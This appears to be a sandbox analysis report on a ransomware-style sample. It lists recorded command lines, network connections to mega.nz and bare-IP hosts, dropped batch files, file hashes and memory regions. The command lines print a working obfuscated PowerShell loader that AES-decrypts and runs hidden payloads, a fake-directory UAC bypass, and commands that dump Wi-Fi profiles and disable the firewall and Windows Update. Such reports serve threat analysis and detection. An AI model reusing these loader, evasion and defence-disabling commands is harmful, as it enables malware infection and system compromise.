$DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
C:\Windows \System32\ComputerDefaults.exe
"C:\Windows \System32\ComputerDefaults.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c call SC.cmd
C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1YnbLPNeUNVUVVxywIOo7MRePVU0zkaX0wmvOUU+5JI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('O1ZS4QT3iZbBumFZuklvIw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NszaK=New-Object System.IO.MemoryStream(,$param_var); $XeHtF=New-Object System.IO.MemoryStream; $IjqXl=New-Object System.IO.Compression.GZipStream($NszaK, [IO.Compression.CompressionMode]::Decompress); $IjqXl.CopyTo($XeHtF); $IjqXl.Dispose(); $NszaK.Dispose(); $XeHtF.Dispose(); $XeHtF.ToArray();}function execute_function($param_var,$param2_var){ $qIrXR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TSbzU=$qIrXR.EntryPoint; $TSbzU.Invoke($null, $param2_var);}$DsdCu = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $DsdCu;$ogPYs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DsdCu).Split([Environment]::NewLine);foreach ($EVBrb in $ogPYs) { if ($EVBrb.StartsWith('amSrAwxpqNlmSpytGMiD')) { $WsuQP=$EVBrb.Substring(20); break; }}$payloads_var=[string[]]$WsuQP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c203cb8,0x7ff84c203cc8,0x7ff84c203cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6688 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,10908307733085571366,16753179932585730640,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:1
C:\Windows\SYSTEM32\cmd.exe
"cmd"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" stop wuauserv
C:\Windows\System32\sc.exe
"C:\Windows\System32\sc.exe" config wuauserv start=disabled
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| CA | 185.206.25.16:443 | gfs302n506.userstorage.mega.co.nz | tcp |
| CA | 185.206.25.16:443 | gfs302n506.userstorage.mega.co.nz | tcp |
| CA | 185.206.25.16:443 | gfs302n506.userstorage.mega.co.nz | tcp |
| CA | 185.206.25.16:443 | gfs302n506.userstorage.mega.co.nz | tcp |
| CA | 185.206.25.16:443 | gfs302n506.userstorage.mega.co.nz | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.208.158.139:27667 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.208.158.228:7000 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.208.158.139:27667 | tcp | |
| IT | 185.196.8.135:7000 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.208.158.139:27667 | tcp | |
| US | 185.208.158.139:27667 | tcp | |
| US | 185.208.158.139:27667 | tcp | |
| US | 185.208.158.228:7000 | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0c5042350ee7871ccbfdc856bde96f3f |
| SHA1 | 90222f176bc96ec17d1bdad2d31bc994c000900c |
| SHA256 | b8b1cb139d4d19a85adce0152fa3c4f6adfb73a322d7253820e848c6f82afc1b |
| SHA512 | 2efdb535fa6a06c4f9702b2129f2dd07c330e37fd10b492f2236007c660c1707773c22005d1e1fa580dbf633dc1a700ada3b7b611ef9accd9555a17a244f61ce |
\??\pipe\LOCAL\crashpad_4152_QXQANLSMDCQHUMOR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5e027def9b55f3d49cde9fb82beba238 |
| SHA1 | 64baabd8454c210162cbc3a90d6a2daaf87d856a |
| SHA256 | 9816e980b04f1fe7efaa4b9c83ff6a0fdd485ee65a884c001b43a0cad7c39d83 |
| SHA512 | a315e1336c5ec70cbb002969e539068ba92f3ec681b6d863db95227fd1808a778fd994e2fb03f28f0e401677aa5f7c66813e315b6b99a5065384c49586f9782e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bcb981221a676aa609ec29f5fff9c542 |
| SHA1 | 9c311b3225c378e1d3c4e2f6722960e8f14b7e05 |
| SHA256 | c3c96b2a677b920edad4166cfce056f94979d41cdcf5c0396cb496b78b969454 |
| SHA512 | 1053cea240745cc595c2b745c3e81b4dfb297cd64366bb739ba1147ed234081a8841acb33acc260a04847879e5baaa875ca7894bdba9f3148074cf4c88601a28 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8c0851600467abf4d1734b6d4f1b2ab6 |
| SHA1 | ceda8f17c6baa4723dddd20ac89e57ec43a116d5 |
| SHA256 | fb3c2540b1fcbfa50d9645a524f5a073b5b8d957bd70cc5fec00e9f4ba3707c9 |
| SHA512 | 6afa96b4a1ec339fd951e82a7f5f798e318a1e7f766102b1de5105c2fa17130e78cdbbfcc2c5e47e930d3133a3d8f5e5b334c0ccf5279007668c3f1be36c6563 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 720b67ecacc169bf7c16e53cc03f0c38 |
| SHA1 | c652b0f9cf7602fd71017016bc1bbb86bc369e77 |
| SHA256 | d4f9fb950b5b7799c0934ada57c66fbd64944cccdf2dc0cec2ae5cd62865e4bd |
| SHA512 | 8897551519bc5a825aecfa807c44b8340db59903e5f84ccc58500129dfc0ce85646425fe2b74cb4fab4950220639b80febdd02ccb623f01fcc8189d56ccacaeb |
C:\Users\Admin\Downloads\Unconfirmed 72931.crdownload
| MD5 | df79a2e9b6b1ea5d0e21a969e47872fb |
| SHA1 | aae0e2095979df8742a216ec22897e165aabacf2 |
| SHA256 | 422239a5b1185c4cada5fc407105fe57d8f7eccfdc2fef28d44213e0657f8d08 |
| SHA512 | d8a7d56f1679e3c1ad25d413674486bf9456fb2df7a622343c75a96b74015902628fcd49a097f61bc4a181faec1018fa6be4cf6d91b336f7eef6f3d11c95159a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b725ab4692566a8a67a90e7f02b45757 |
| SHA1 | c62c455d0b7756870805df71957ded4ede429f98 |
| SHA256 | 675285ab59590e682e792a704722370ff02ba1723b840407e6bea53ce12a637c |
| SHA512 | b9fdd097a7542a58c8db290ed522c6e670a33acf5b72bda3f8ce98e00f8a25957ae28df689a6f92e8b82d0d68332cf2897a5f06ce0f895185988adc2e8f84c19 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57b844.TMP
| MD5 | 37674e9fe5bf4c6c80e12ef134ec115b |
| SHA1 | 74b2baf783d11d042f42339927db3db675dc7818 |
| SHA256 | 942488bd26bf1478f59b24af423544217eb32901cb766b2ed4013542b922e291 |
| SHA512 | a71421b1fe77645aed3122e86397a2eb97c5830ae90d650ffc76ebaab71ce9d1219549f0ee181c3dc6706183b0a2c509dad9c5a24cc8f73901bf4c48c3899c71 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 03ef754492169e70e615a1c9a6f8f693 |
| SHA1 | 7a046e9c2ced9c58afc758ae2482c26f96bdb08a |
| SHA256 | b52bfeb8e1c3104556d6c765780fd7eeaef373d578489ef9b685ab4d45b8ec87 |
| SHA512 | 1ea344da769f03c1dbfa2d2544292a4067addbf7a7c8eb2bcd5fcbfba62ac53921cf10b69a6a5f182a1567749c62fd9d944c720c39c338154767119b61cef5d3 |
C:\Users\Admin\Downloads\KLLauncher.bat:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
memory/3812-215-0x0000012BB47B0000-0x0000012BB47D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lr0r4ei5.vwd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3812-223-0x0000012BB4A10000-0x0000012BB4A56000-memory.dmp
memory/3812-233-0x0000012BB49F0000-0x0000012BB4A00000-memory.dmp
memory/3812-234-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/3812-235-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/3812-236-0x0000012BB5130000-0x0000012BB52B2000-memory.dmp
C:\Windows \System32\ComputerDefaults.exe
| MD5 | 640693107ee411d8e862ab115d7b4639 |
| SHA1 | 497435f5727c5bfe31331ba245e9b7b95dc69d2a |
| SHA256 | a2794be7cb7a4ad2f526fe91ca95a36b2ec1648b288088eaa4809402c7b2c6f4 |
| SHA512 | 3a554fe1d8d23f06ac86bb078b3e5b4815722adbacbf9492b5b7ad27bf27d44dd948387268dedc2943afc3557ef234e8882475c813cc5f5f4ab566e52bbb03db |
C:\Windows \System32\MLANG.dll
| MD5 | e286ada1af4b08fa4b7c78f862883c4e |
| SHA1 | 798ebc7b7cd3db667f1a59ade299be4cff397f39 |
| SHA256 | 16eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3 |
| SHA512 | fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5 |
memory/3780-259-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/3780-258-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/3780-270-0x000002556FBC0000-0x000002556FD04000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4875ef7bbbd9ec69a21564df9a79ccef |
| SHA1 | f4466477412c77fb6c2e317d5b4fe2bdf48b8d4f |
| SHA256 | 8c1ccd78627808d249ddf038f3e6b3eb9b68b63a2805282eec416600c5629549 |
| SHA512 | 90e74486c2e321dce1c814da1a034973b562382cc356c744dd04ea880744ea461094f43f55d5d50da279ad30c4d348814a30b82471325223cff16298b3fbdefd |
C:\Users\Admin\AppData\Local\Temp\Crypt.bat
| MD5 | 2358c107f2e3a850178c60f6afb20be1 |
| SHA1 | d6a0849ba677b6fde26d132dd54c0083eacae024 |
| SHA256 | 8f81bb12d135459f6bf1ab45ec9177ea4b29612af4d3f9a416dc42171e542d65 |
| SHA512 | 245cc1aee968aa599f17da4e4c28c212126f008757b667b10187f072fec2b49c55fee8bc773dd7349e7b3cda7849e7f5879b0b9405d67eeaefce1d7f6b7fdcb3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 88dc70c361a22feac57b031dd9c1f02f |
| SHA1 | a9b4732260c2a323750022a73480f229ce25d46d |
| SHA256 | 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59 |
| SHA512 | 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c |
C:\Users\Admin\AppData\Local\Temp\Ready.bat
| MD5 | 668a80a060086cb084f44fe2e7d70948 |
| SHA1 | 5064298fb8e96230c85e988d1f13aa3ea679eee4 |
| SHA256 | cd0fa02854edb8245e74932360e97861a48aa98249409917daed8381d876cc4f |
| SHA512 | 54b3d40497c3a908564103982ce0f0a13b175bcfabd4862de21b058bda405e88b09c99161c4d38a3a039055aba14511304148e7196fed34b3ea00c92e8e1f235 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 2be01b08c0543a607976a31921b431be |
| SHA1 | a9a5d0782d6583aada06fc44176c76e1f94b9b97 |
| SHA256 | c291b834ed17f0f1fef20d2ad721c4786074037421991fbdaf01930330c8bf1f |
| SHA512 | e740c11501a3fc575c8ef253dffc9552555eb93873f79e30b32003d6eaf37e6e41cf39da011a356b0ca4a41b278706f1e3908ea20be1ded90100f8d8312a33c0 |
memory/1900-310-0x000001FECA6C0000-0x000001FECA6D0000-memory.dmp
memory/1900-311-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/1900-312-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/1900-313-0x000001FECAD80000-0x000001FECADCE000-memory.dmp
memory/4888-326-0x000001F7FD500000-0x000001F7FD510000-memory.dmp
memory/4888-328-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/4888-327-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/4888-329-0x000001F7FDBA0000-0x000001F7FDC8C000-memory.dmp
memory/4888-332-0x000001F7FDC90000-0x000001F7FDD6A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |
memory/4308-353-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/4308-352-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/4308-360-0x0000028CC5E70000-0x0000028CC5E86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Zero.bat
| MD5 | b193cc73c1120f4e277ad9a1b242d98c |
| SHA1 | 6e99a9d4b013f299c27ad6b984a06757cedc1d23 |
| SHA256 | 48a65a2e51fb4891bff918cf55231b1cc4aee129f945789b2d7f8cd988b66a02 |
| SHA512 | 3593592c38590786e1187704634203b269692f69e1f0c7af417ace4d076deb74260a8f55b8a100a0cd142e4df20dfed26b5b4f83e3cbb12ecf399cd6b5180cf3 |
C:\Users\Admin\AppData\Local\Temp\Lion.bat
| MD5 | 54f4209e9822dcbb808ce58ad71bb220 |
| SHA1 | bf69591a55b153acfe2f95de88240515dacb12c1 |
| SHA256 | 3b435337d04e078702eff4d242a4c4a5c7580dfdcae6fd78469b02fa51d75f2b |
| SHA512 | b5df846cec5b2802358e9718f6fa4fb38735c7f12677381cafc8c461bfa93b8685e58e179ef062a600fa8b74acd1e102068a8b921cbb2293ef70d996531d31c9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 71bda94964d6289e6fa631df9ac0f1f7 |
| SHA1 | d311bc49013b450958ff644da7b7c911b0eec0f9 |
| SHA256 | 61f49244f9119a7d97fe21d9e80908ead31194b465753b618c5d6db685e40260 |
| SHA512 | 7bdadaa466637894e6bab889248212ddebb9821860f32ec40182041584807ba69f82918c8ebfef1afe8e32488edd49307a29cb976cef7a1ebf32e70365cdcf02 |
memory/3732-389-0x000002496E920000-0x000002496E930000-memory.dmp
memory/3732-390-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/3732-391-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/3732-392-0x000002496F040000-0x000002496F0C4000-memory.dmp
memory/4612-405-0x000002BFE9A30000-0x000002BFE9A40000-memory.dmp
memory/4612-407-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/4612-408-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/4612-409-0x000002BFE9DA0000-0x000002BFE9DEE000-memory.dmp
memory/4612-412-0x000002BFE9A40000-0x000002BFE9A56000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | e566632d8956997225be604d026c9b39 |
| SHA1 | 94a9aade75fffc63ed71404b630eca41d3ce130e |
| SHA256 | b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0 |
| SHA512 | f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd |
memory/5392-443-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/5392-444-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/5392-451-0x000001A6F5BE0000-0x000001A6F5C6C000-memory.dmp
memory/5576-468-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/5576-469-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/5576-472-0x0000025854E80000-0x0000025854E96000-memory.dmp
memory/5704-485-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
memory/5704-486-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/1900-487-0x000001FECAF20000-0x000001FECAF36000-memory.dmp
memory/5392-508-0x000001A6F6710000-0x000001A6F681A000-memory.dmp
memory/5392-509-0x000001A6F6620000-0x000001A6F6632000-memory.dmp
memory/5392-510-0x000001A6F6680000-0x000001A6F66BC000-memory.dmp
memory/5392-512-0x000001A6F68A0000-0x000001A6F6916000-memory.dmp
memory/5392-513-0x000001A6F6660000-0x000001A6F667E000-memory.dmp
memory/5392-523-0x000001A6F8D30000-0x000001A6F9258000-memory.dmp
memory/5392-522-0x000001A6F8630000-0x000001A6F87F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | bf4fbdf5f798a4e95375def4406bc056 |
| SHA1 | 735994e2b97813a66a042539e9d8cfc1cdc0953b |
| SHA256 | 9626921f63d3cc511386aef5bfefaa480cf06315129db1f4da4d9395c73858a1 |
| SHA512 | 02b82447b4d16d943e2f2607a148d1e58af9fb045e09835cc802d766dacd39b0d1402538ab43335dfa56ce2a6c36c6ad195c5efc8054cf2766824df4c786d708 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies
| MD5 | b8c462edd1a72afbef10f5c8516bb84c |
| SHA1 | 6fc9e77ffc9549d630162bf3ffaa4377b8169e50 |
| SHA256 | 39dba404ec86ff61045b73716add587097bf67bee3b6da724cc4f3a6ee0f111f |
| SHA512 | 7b70c7935221881fa04ad4aae29fe2520c0fabb9b0961912b3d5d0693e6ca98dbdc8a2fc0bb08dcef240bec0282bb226ff02c8ce5823dd2a593fef1ebaf09865 |
C:\Users\Admin\AppData\Local\Temp\tmp27CA.tmp
| MD5 | 14ccc9293153deacbb9a20ee8f6ff1b7 |
| SHA1 | 46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3 |
| SHA256 | 3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511 |
| SHA512 | 916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 807728840ff468b46a3b9624461c540d |
| SHA1 | 225a1204a77df81608d37a4a0358590ada609ad7 |
| SHA256 | 3d419ac12c0199eac92f33cf485942b7b2fd4cacd081d8a4bc6c1295ab81e1e8 |
| SHA512 | 1d1e8d08c473b3470fe9c4c784acb7740d8f29351cbb09d610cc9c669b2315945dd3be07e1fd66af3f7cf9711c28579ecad9cc22bf2901605dbd152615073dfe |
C:\Users\Admin\AppData\Local\Temp\tmp282A.tmp
| MD5 | 87210e9e528a4ddb09c6b671937c79c6 |
| SHA1 | 3c75314714619f5b55e25769e0985d497f0062f2 |
| SHA256 | eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1 |
| SHA512 | f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0 |
memory/1860-570-0x00007FF85A750000-0x00007FF85A80D000-memory.dmp
memory/1860-569-0x00007FF85AEE0000-0x00007FF85B0E9000-memory.dmp
